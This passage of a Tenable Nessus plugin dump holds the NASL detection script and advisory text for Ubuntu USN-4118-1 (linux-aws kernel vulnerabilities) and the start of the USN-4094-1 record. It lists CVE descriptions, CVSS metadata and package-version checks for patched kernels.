Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-09-03T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS : linux-aws vulnerabilities (USN-4118-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14609", "CVE-2019-14763", "CVE-2019-15218", "CVE-2018-13053", "CVE-2019-15090", "CVE-2019-3900", "CVE-2018-14610", "CVE-2018-13096", "CVE-2019-0136", "CVE-2018-13098", "CVE-2019-14284", "CVE-2019-12984", "CVE-2019-10639", "CVE-2018-20784", "CVE-2019-15216", "CVE-2018-13100", "CVE-2019-15211", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2019-11085", "CVE-2018-13099", "CVE-2019-13272", "CVE-2019-9506", "CVE-2019-15215", "CVE-2019-13631", "CVE-2018-16862", "CVE-2019-11884", "CVE-2019-10207", "CVE-2019-15220", "CVE-2019-11810", "CVE-2019-11833", "CVE-2019-15212", "CVE-2019-11599", "CVE-2019-15221", "CVE-2018-14614", "CVE-2019-10638", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2019-3701", "CVE-2019-15292", "CVE-2019-11487", "CVE-2018-14612", "CVE-2019-2024", "CVE-2019-11815", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-15214", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-3819", "CVE-2018-19985", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613", "CVE-2019-14283"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-aws", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-hwe", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws"], "id": "UBUNTU_USN-4118-1.NASL", "href": "https://www.tenable.com/plugins/nessus/128478", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from 
Ubuntu Security Notice USN-4118-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128478);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/24 11:30:51\");\n\n script_cve_id(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-19985\", \"CVE-2018-20169\", \"CVE-2018-20511\", \"CVE-2018-20784\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-0136\", \"CVE-2019-10126\", \"CVE-2019-10207\", \"CVE-2019-10638\", \"CVE-2019-10639\", \"CVE-2019-11085\", \"CVE-2019-11487\", \"CVE-2019-11599\", \"CVE-2019-11810\", \"CVE-2019-11815\", \"CVE-2019-11833\", \"CVE-2019-11884\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-13631\", \"CVE-2019-14283\", \"CVE-2019-14284\", \"CVE-2019-14763\", \"CVE-2019-15090\", \"CVE-2019-15211\", \"CVE-2019-15212\", \"CVE-2019-15214\", \"CVE-2019-15215\", \"CVE-2019-15216\", \"CVE-2019-15218\", \"CVE-2019-15220\", \"CVE-2019-15221\", \"CVE-2019-15292\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3701\", \"CVE-2019-3819\", \"CVE-2019-3846\", \"CVE-2019-3900\", \"CVE-2019-9506\");\n script_xref(name:\"USN\", value:\"4118-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : linux-aws vulnerabilities (USN-4118-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It 
was discovered that the alarmtimer implementation in the Linux\nkernel contained an integer overflow vulnerability. A local attacker\ncould use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use\nthis to construct a malicious XFS image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. An attacker could use\nthis to construct a malicious f2fs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13096,\nCVE-2018-13097, CVE-2018-13098, CVE-2018-13099, CVE-2018-13100,\nCVE-2018-14614, CVE-2018-14615, CVE-2018-14616)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system\nimplementation in the Linux kernel did not properly validate metadata.\nAn attacker could use this to construct a malicious btrfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-14609, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612,\nCVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some\nsituations. An attacker could use this to construct a malicious HFS+\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache\nsubsystem of the Linux kernel did not properly initialize new files in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed\ndriver in the Linux kernel did not properly validate metadata received\nfrom the device. A physically proximate attacker could use this to\ncause a denial of service (system crash). 
(CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the\nLinux kernel did not properly handle size checks when handling an\nextra USB descriptor. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could be triggered in the\nCFS Linux kernel process scheduler. A local attacker could possibly\nuse this to cause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block\nlayer subsystem of the Linux kernel when certain failure conditions\noccurred. A local attacker could possibly use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth\nimplementation in the Linux kernel did not properly validate elliptic\ncurve parameters during Diffie-Hellman key exchange in some\nsituations. An attacker could use this to expose sensitive\ninformation. (CVE-2018-5383)\n\nIt was discovered that the Intel wifi device driver in the Linux\nkernel did not properly validate certain Tunneled Direct Link Setup\n(TDLS). A physically proximate attacker could use this to cause a\ndenial of service (wifi disconnect). (CVE-2019-0136)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local\nattacker could use this to cause a denial of service. (CVE-2019-10207)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not\nsufficiently randomize IP ID values generated for connectionless\nnetworking protocols. 
A remote attacker could use this to track\nparticular Linux devices. (CVE-2019-10638)\n\nAmit Klein and Benny Pinkas discovered that the location of kernel\naddresses could be exposed by the implementation of connection-less\nnetwork protocols in the Linux kernel. A remote attacker could\npossibly use this to assist in the exploitation of another\nvulnerability in the Linux kernel. (CVE-2019-10639)\n\nAdam Zabrocki discovered that the Intel i915 kernel mode graphics\ndriver in the Linux kernel did not properly restrict mmap() ranges in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2019-11085)\n\nIt was discovered that an integer overflow existed in the Linux kernel\nwhen reference counting pages, leading to potential use-after-free\nissues. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-11487)\n\nJann Horn discovered that a race condition existed in the Linux kernel\nwhen performing core dumps. A local attacker could use this to cause a\ndenial of service (system crash) or expose sensitive information.\n(CVE-2019-11599)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the LSI Logic MegaRAID driver in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-11810)\n\nIt was discovered that a race condition leading to a use-after-free\nexisted in the Reliable Datagram Sockets (RDS) protocol implementation\nin the Linux kernel. The RDS protocol is blacklisted by default in\nUbuntu. If enabled, a local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2019-11815)\n\nIt was discovered that the ext4 file system implementation in the\nLinux kernel did not properly zero out memory in some situations. 
A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-11833)\n\nIt was discovered that the Bluetooth Human Interface Device Protocol\n(HIDP) implementation in the Linux kernel did not properly verify\nstrings were NULL terminated in certain situations. A local attacker\ncould use this to expose sensitive information (kernel memory).\n(CVE-2019-11884)\n\nIt was discovered that a NULL pointer dereference vulnerability existed\nin the Near-field communication (NFC) implementation in the Linux\nkernel. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux\nkernel improperly dropped a device reference in an error condition,\nleading to a use-after-free. An attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the Near-field communication (NFC) implementation in the\nLinux kernel. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux\nkernel when accessing LDT entries in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux\nkernel did not properly record credentials in some situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the GTCO tablet input driver in the Linux\nkernel did not properly bounds check the initial HID report sent by\nthe device. 
A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2019-13631)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A\nlocal attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-14284)\n\nTuba Yavuz discovered that a race condition existed in the DesignWare\nUSB3 DRD Controller device driver in the Linux kernel. A physically\nproximate attacker could use this to cause a denial of service.\n(CVE-2019-14763)\n\nIt was discovered that an out-of-bounds read existed in the QLogic\nQEDI iSCSI Initiator Driver in the Linux kernel. A local attacker\ncould possibly use this to expose sensitive information (kernel\nmemory). (CVE-2019-15090)\n\nIt was discovered that the Raremono AM/FM/SW radio device driver in\nthe Linux kernel did not properly allocate memory, leading to a\nuse-after-free. A physically proximate attacker could use this to\ncause a denial of service or possibly execute arbitrary code.\n(CVE-2019-15211)\n\nIt was discovered that a double-free error existed in the USB Rio 500\ndevice driver for the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service. (CVE-2019-15212)\n\nIt was discovered that a race condition existed in the Advanced Linux\nSound Architecture (ALSA) subsystem of the Linux kernel, leading to a\npotential use-after-free. A physically proximate attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. 
(CVE-2019-15214)\n\nIt was discovered that a race condition existed in the CPiA2\nvideo4linux device driver for the Linux kernel, leading to a\nuse-after-free. A physically proximate attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-15215)\n\nIt was discovered that a race condition existed in the Softmac USB\nPrism54 device driver in the Linux kernel. A physically proximate\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-15220)\n\nIt was discovered that a use-after-free vulnerability existed in the\nAppletalk implementation in the Linux kernel if an error occurs during\ninitialization. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15292)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free\nvulnerability when disconnecting the device. An attacker could use\nthis to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in\nthe Linux kernel did not properly validate control bits, resulting in\nan out of bounds buffer read. A local attacker could use this to\npossibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the\nLinux kernel did not properly validate the BSS descriptor. A local\nattacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nJason Wang discovered that an infinite loop vulnerability existed in\nthe virtio net driver in the Linux kernel. A local attacker in a guest\nVM could possibly use this to cause a denial of service in the host\nsystem. (CVE-2019-3900)\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper B. 
Rasmussen\ndiscovered that the Bluetooth protocol BR/EDR specification did not\nproperly require sufficiently strong encryption key lengths. A\nphysically proximate attacker could use this to expose sensitive\ninformation. (CVE-2019-9506)\n\nIt was discovered that the Appletalk IP encapsulation driver in the\nLinux kernel did not properly prevent kernel addresses from being\ncopied to user space. A local attacker with the CAP_NET_ADMIN\ncapability could use this to expose sensitive information.\n(CVE-2018-20511)\n\nIt was discovered that a race condition existed in the USB YUREX\ndevice driver in the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2019-15216)\n\nIt was discovered that the Siano USB MDTV receiver device driver in\nthe Linux kernel made improper assumptions about the device\ncharacteristics. A physically proximate attacker could use this to cause\na denial of service (system crash). (CVE-2019-15218)\n\nIt was discovered that the Line 6 POD USB device driver in the Linux\nkernel did not properly validate data size information from the\ndevice. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-15221)\n\nMuyu Yu discovered that the CAN implementation in the Linux kernel in\nsome situations did not properly restrict the field size when\nprocessing outgoing frames. A local attacker with CAP_NET_ADMIN\nprivileges could use this to execute arbitrary code. (CVE-2019-3701)\n\nVladis Dronov discovered that the debug interface for the Linux\nkernel's HID subsystem did not properly validate passed parameters in\nsome situations. A local privileged attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2019-3819).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4118-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.15-aws, linux-image-aws and / or\nlinux-image-aws-hwe packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-hwe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/03\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019 Canonical, Inc. / NASL script (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-19985\", \"CVE-2018-20169\", \"CVE-2018-20511\", \"CVE-2018-20784\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-0136\", \"CVE-2019-10126\", \"CVE-2019-10207\", \"CVE-2019-10638\", \"CVE-2019-10639\", \"CVE-2019-11085\", \"CVE-2019-11487\", \"CVE-2019-11599\", \"CVE-2019-11810\", \"CVE-2019-11815\", 
\"CVE-2019-11833\", \"CVE-2019-11884\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-13631\", \"CVE-2019-14283\", \"CVE-2019-14284\", \"CVE-2019-14763\", \"CVE-2019-15090\", \"CVE-2019-15211\", \"CVE-2019-15212\", \"CVE-2019-15214\", \"CVE-2019-15215\", \"CVE-2019-15216\", \"CVE-2019-15218\", \"CVE-2019-15220\", \"CVE-2019-15221\", \"CVE-2019-15292\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3701\", \"CVE-2019-3819\", \"CVE-2019-3846\", \"CVE-2019-3900\", \"CVE-2019-9506\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-4118-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1047-aws\", pkgver:\"4.15.0-1047.49~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws-hwe\", pkgver:\"4.15.0.1047.47\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1047-aws\", pkgver:\"4.15.0-1047.49\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-aws\", pkgver:\"4.15.0.1047.46\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-aws / linux-image-aws / linux-image-aws-hwe\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T11:00:29", "description": "It was discovered that the alarmtimer implementation in the Linux\nkernel contained an integer overflow vulnerability. A local attacker\ncould use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. 
An attacker could use\nthis to construct a malicious XFS image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. An attacker could use\nthis to construct a malicious f2fs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13097,\nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616,\nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system\nimplementation in the Linux kernel did not properly validate metadata.\nAn attacker could use this to construct a malicious btrfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613,\nCVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some\nsituations. An attacker could use this to construct a malicious HFS+\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache\nsubsystem of the Linux kernel did not properly initialize new files in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the\nLinux kernel did not properly handle size checks when handling an\nextra USB descriptor. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block\nlayer subsystem of the Linux kernel when certain failure conditions\noccurred. 
A local attacker could possibly use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth\nimplementation in the Linux kernel did not properly validate elliptic\ncurve parameters during Diffie-Hellman key exchange in some\nsituations. An attacker could use this to expose sensitive\ninformation. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors\nincorrectly handle SWAPGS instructions during speculative execution. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux\nkernel did not properly check for allocation errors in some\nsituations. A local attacker could possibly use this to cause a denial\nof service (system crash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerability existed\nin the Near-field communication (NFC) implementation in the Linux\nkernel. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux\nkernel improperly dropped a device reference in an error condition,\nleading to a use-after-free. An attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the Near-field communication (NFC) implementation in the\nLinux kernel. A local attacker could use this to cause a denial of\nservice (system crash). 
(CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux\nkernel when accessing LDT entries in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux\nkernel did not properly record credentials in some situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free\nvulnerability when disconnecting the device. An attacker could use\nthis to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in\nthe Linux kernel did not properly validate control bits, resulting in\nan out of bounds buffer read. A local attacker could use this to\npossibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the\nLinux kernel did not properly validate the BSS descriptor. A local\nattacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the\nLinux kernel did not properly prevent kernel addresses from being\ncopied to user space. A local attacker with the CAP_NET_ADMIN\ncapability could use this to expose sensitive information.\n(CVE-2018-20511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-14T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Linux kernel vulnerabilities (USN-4094-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-14610", "CVE-2018-13096", "CVE-2018-13098", "CVE-2019-12984", "CVE-2018-13100", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2018-13099", "CVE-2019-13272", "CVE-2018-16862", "CVE-2018-14614", "CVE-2019-12614", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-14612", "CVE-2019-2024", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-1125", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613"], "modified": "2019-08-14T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oracle", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke-4.15", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-raspi2", 
"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gke", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-4094-1.NASL", "href": "https://www.tenable.com/plugins/nessus/127889", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4094-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
